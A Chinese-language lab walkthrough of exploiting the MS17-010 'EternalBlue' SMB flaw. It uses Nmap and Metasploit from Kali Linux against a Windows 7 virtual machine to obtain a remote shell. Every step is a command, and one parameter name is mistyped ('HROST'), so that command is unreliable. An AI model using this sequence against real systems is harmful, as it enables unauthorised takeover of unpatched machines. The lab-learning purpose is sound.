工具和环境:
- Nmap端口扫描器
- Metasploit漏洞检测工具
- Kali Linux(前面的两样工具都在Kali Linux中有集成,是攻击机)
- Windows 7(作为被攻击机,IP地址为:192.168.229.134)
- VMware虚拟机
1. 打开Kali Linux的命令行输入框,在命令行中输入 "nmap -sV 192.168.229.134"扫描Windows7(被攻击机)开放的端口以及其余相关信息
2. 可以看到,被攻击机的 445 端口是开放的,由此可以判断可以基于MS17_010进行"永恒之蓝攻击"
3. 输入"msfconsole"进入 Metasploit 命令行操作
4. 输入 “search ms17_010” 搜索与该漏洞相关的代码库 (注:auxiliary开头的代码是辅助功能代码;exploit开头的是我们将要使用的渗透代码)
5. 输入 “use exploit/windows/smb/ms17_010_eternalblue” 调用该渗透代码
6. 输入 “show options” 查看该代码可以使用的参数,为后面设置某些参数做参考
7. 输入 "set HROST 192.168.229.134"设置攻击对象的IP地址,本实验中就是把该参数设为Windows 7的IP地址
8. 输入 “exploit”,就是把上面设置好参数的代码注入给被攻击机(Windows 7)进行渗透,最后可以获取到Windows 7的控制权,返回了Windows 7的shell界面,在上面可以进行命令行的操作,攻击成功
注:不同的主机攻击效果可能不同,本实验还有一种攻击结果是被攻击机蓝屏。